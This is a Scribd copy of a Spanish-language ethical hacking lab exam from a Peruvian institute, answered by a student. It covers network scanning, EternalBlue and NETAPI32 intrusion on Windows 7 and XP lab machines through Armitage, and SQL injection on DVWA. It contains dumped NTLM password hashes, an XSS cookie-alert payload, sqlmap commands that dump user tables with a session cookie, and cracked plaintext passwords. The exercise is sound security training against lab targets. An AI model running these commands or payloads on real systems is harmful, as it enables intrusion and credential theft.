Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • 141 vistas

    1942 - Intrusión Ética - T5HN - 01 - CL - 2 - Gerardo Sarmiento Quistán

    Cargado por

    Evaristo Palacín
    Este documento presenta un caso de laboratorio sobre intrusión ética que debe ser resuelto por un estudiante. El estudiante deberá usar herramientas como netdiscover, nmap y dmitry para analizar una red indicada, luego identificar vulnerabilidades en equipos Windows 7 y XP usando Armitage e inyectar SQL en un servidor DVWA. El estudiante presentará capturas de pantalla como evidencia en 4 preguntas, y será calificado en base a criterios como visualización de equipos, ingreso a sistemas vulnerables y enumeración de cuentas.

    Copyright:

    © All Rights Reserved
    Descargue como DOCX, PDF, TXT o lea en línea desde Scribd

    1942 - Intrusión Ética - T5HN - 01 - CL - 2 - Gerardo Sarmiento Quistán

    Cargado por

    Evaristo Palacín
    141 vistas17 páginas
    Este documento presenta un caso de laboratorio sobre intrusión ética que debe ser resuelto por un estudiante. El estudiante deberá usar herramientas como netdiscover, nmap y dmitry para analizar una red indicada, luego identificar vulnerabilidades en equipos Windows 7 y XP usando Armitage e inyectar SQL en un servidor DVWA. El estudiante presentará capturas de pantalla como evidencia en 4 preguntas, y será calificado en base a criterios como visualización de equipos, ingreso a sistemas vulnerables y enumeración de cuentas.

    Descripción original:

    Título original

    1942_INTRUSIÓN ÉTICA_T5HN_01_CL_2_GERARDO SARMIENTO QUISTÁN

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    DOCX, PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Este documento presenta un caso de laboratorio sobre intrusión ética que debe ser resuelto por un estudiante. El estudiante deberá usar herramientas como netdiscover, nmap y dmitry para analizar una red indicada, luego identificar vulnerabilidades en equipos Windows 7 y XP usando Armitage e inyectar SQL en un servidor DVWA. El estudiante presentará capturas de pantalla como evidencia en 4 preguntas, y será calificado en base a criterios como visualización de equipos, ingreso a sistemas vulnerables y enumeración de cuentas.

    Copyright:

    © All Rights Reserved
    Descargue como DOCX, PDF, TXT o lea en línea desde Scribd
    Descargar como docx, pdf o txt
    141 vistas17 páginas

    1942 - Intrusión Ética - T5HN - 01 - CL - 2 - Gerardo Sarmiento Quistán

    Cargado por

    Evaristo Palacín
    Este documento presenta un caso de laboratorio sobre intrusión ética que debe ser resuelto por un estudiante. El estudiante deberá usar herramientas como netdiscover, nmap y dmitry para analizar una red indicada, luego identificar vulnerabilidades en equipos Windows 7 y XP usando Armitage e inyectar SQL en un servidor DVWA. El estudiante presentará capturas de pantalla como evidencia en 4 preguntas, y será calificado en base a criterios como visualización de equipos, ingreso a sistemas vulnerables y enumeración de cuentas.

    Copyright:

    © All Rights Reserved
    Descargue como DOCX, PDF, TXT o lea en línea desde Scribd
    Descargar como docx, pdf o txt
    de 17

    INSTITUTO DE EDUACIÓN SUPERIOR CIBERTEC

    DIRECCIÓN ACADÉMICA
    CARRERA PROFESIONALES

    CURSO : 1942 - Intrusión Ética


    PROFESOR : Ing. Gerardo Sarmiento Quistán
    SEMESTRE : 2021 - 2
    CICLO : Quinto
    SECCIÓN : T5HN
    GRUPO : 01
    FECHA INICIO : jueves 28 de octubre de 2021 – 10:15 pm
    FECHA TÉRMINO : viernes 29 de octubre del 2021 – 11:59 pm

    ALUMNO (A) : PALACIN VENTURO EVARISTO

    CASO DE LABORATORIO 2 – CL2

    Logro

    Tenga presente que el logro de esta evaluación, es que usted aplique de manera correcta y eficiente
    las herramientas de intrusión ética para la recopilación de información

    Consideraciones generales:

     En la calificación influirá el orden, la limpieza y la claridad de las respuestas.


     La evaluación será entregada a través del aula virtual.
     Poner su “Apellido” como nombre de la máquina virtual (Parrot)
     Evidenciar con capturas de pantalla completa sus respuestas

    Consolidado

    Puntaje Llenar solo en caso de Recalificación justificada


    Pregunta
    Máximo Obtenido Sustento Puntaje
    1 03
    2 05
    3 06
    4 06
    Nota Recalificada

    Escenario
    Implementar la siguiente red con las máquinas virtuales suministradas en clase

    Pregunta 01

    Use netdiscover, nmap y dmitry para hacer el análisis de la red indicada por el docente

     Registro de Información – Puertos/servicios/versiones/SO/banner

    Capturas de pantalla completa, una para cada resultado de los comandos solicitados
    NETDISCOVER

    NMAP
    DIMITRY
    192.168.1.8

    192.168.1.9
    192.168.1.105
    Pregunta 02

    Identifique la vulnerabilidad que puede afectar al equipo Windows 7 entregado, detalle el proceso de intrusión a
    través de Armitage e ingrese al equipo creando una nueva cuenta.

     Vulnerabilidad encontrada
    ETERNALBLUE
     Proceso de intrusión
     Ingreso al sistema con la nueva cuenta

     Indique que medidas de seguridad implementaría para mejorar la seguridad.

    Actualizar los sistemas a su última versión o parchear según informa el fabricante


    Para los sistemas sin soporte o parche se recomienda aislar de la red o apagar según sea el caso.
    Aislar la comunicación a los puertos 137 y 138 UDP y puertos 139 y 445 TCP en las redes de las organizaciones.

    Pregunta 03

    Use la herramienta Armitage para identificar la vulnerabilidad del equipo Windows XP encontrado y complete la
    siguiente información:

     Vulnerabilidad encontrada
    Vulnerabilidad para la ejecución remota de código NETAPI32
     Proceso de intrusión
     Enumere las cuentas de usuario del equipo vulnerado y los hashes de las contraseñas
    [+] Administrador:500:598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf:::
    [+] Asistente de ayuda:1000:4e530d6ba8c489c2c0a0899b9521f1c1:ef29dbb98a365b2fcf1d182cbf2bab73:::
    [+] cl2:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [+] cl3:1004:e6efe4be4568c7fdaad3b435b51404ee:ee8e591e16c5484da6401d18d69fa98b:::
    [+] Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ebf21712c3197634f64675c8e8cf592a:::
     Indique que nivel de acceso ha logrado y que acciones tomaría para mejorar la seguridad

    Pregunta 04

    A través de Inyección SQL del servidor DVWA y complete la siguiente información


     Vulnerabilidad encontrada
     Proceso de intrusión

    <script>alert(document.cookie)<script>
    Aplicar el comando
    sqlmap -u "http://192.168.1.105/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie
    "PHPSESSID=o8maecikq8l403rjp58a469cj2; security=low" -D dvwa –tables

    Comando
    sqlmap -u "http://192.168.1.105/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie
    "PHPSESSID=o8maecikq8l403rjp58a469cj2; security=low" -D dvwa -T users –column
    Aplicar el comando
    sqlmap -u "http://192.168.1.105/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie
    "PHPSESSID=o8maecikq8l403rjp58a469cj2; security=low" -D dvwa -T users -C
    user,avatar,first_name,last_name,password,user_id –dump
     Conseguir las claves en texto plano
    | admin password
    | gordonb abc123
    | 1337 charley
    | pablo letmein
    | smithy password
     Indique que medidas de seguridad implementaría para mejorar la seguridad.

    RÚBRICA DE EVALUACIÓN

    CRITERIO ESCALA DE CALIFICACIÓN

     Enumera correctamente  Enumera correctamente  Visualiza correctamente


    los puertos (1 punto) los puertos (1 punto) los equipos (1 punto)
    Pregunta 1
     Enumera correctamente  Enumera correctamente
    los servicios y versiones los servicios y versiones
    netdiscover y (1 puntos) (1 puntos)
    nmap  Especifica el sistema
    operativo (1 punto)
    (3 puntos)
    3 puntos 2 puntos 1 puntos

     Visualiza el equipo con  Visualiza el equipo con  Visualiza el equipo con Visualiza el equipo con
    Armitage (1 punto) Armitage (1 punto) Armitage (1 punto) Armitage (1 punto)
     Logra ingresar al servidor  Logra ingresar al  Logra ingresar al servidor
    Pregunta 2 vulnerado (1 punto) servidor vulnerado (1 vulnerado (1 punto)
     Ingresa al equipo con la punto)
    Armitage cuenta creada (2 puntos)  Ingresa al equipo con la
    Windows 7  Detalla medidas de cuenta creada (2 puntos)
    mejora (1 punto)
    (5 puntos)

    5 puntos 4 puntos 2 puntos 1 punto

     Visualiza el equipo con  Visualiza el equipo con  Visualiza el equipo con  Visualiza el equipo con
    Armitage (1 punto) Armitage (1 punto) Armitage (1 punto) Armitage (1 punto)
    Pregunta 3  Logra ingresar al servidor  Logra ingresar al  Logra ingresar al servidor
    vulnerado (1 punto) servidor vulnerado (1 vulnerado (1 punto)
     Enumera las cuentas de punto)
    Armitage
    Windows XP usuario y contraseñas (2  Enumera las cuentas de
    puntos) usuario y contraseñas (2
     Indica el nivel de acceso puntos)
    y acciones de mejora (2
    (6 puntos) puntos)

    6 puntos 4 puntos 2 puntos 1 punto

     Visualiza el equipo con  Visualiza el equipo con  Visualiza el equipo (1 Visualiza el equipo(1
    Armitage (1 punto) Armitage (1 punto) punto) punto)
     Logra ingresar al servidor  Logra ingresar al  Logra ingresar al servidor
    Pregunta 3 vulnerado (1 punto) servidor vulnerado (1 vulnerado (1 punto)
     Muestra las claves en punto)
    Inyección SQL texto plano (2 puntos)  Muestra las claves en
     Detalla medidas de texto plano (2 puntos)
    mejora (2 punto)
    (6 puntos)

    6 puntos 4 puntos 2 puntos 1 punto

    También podría gustarte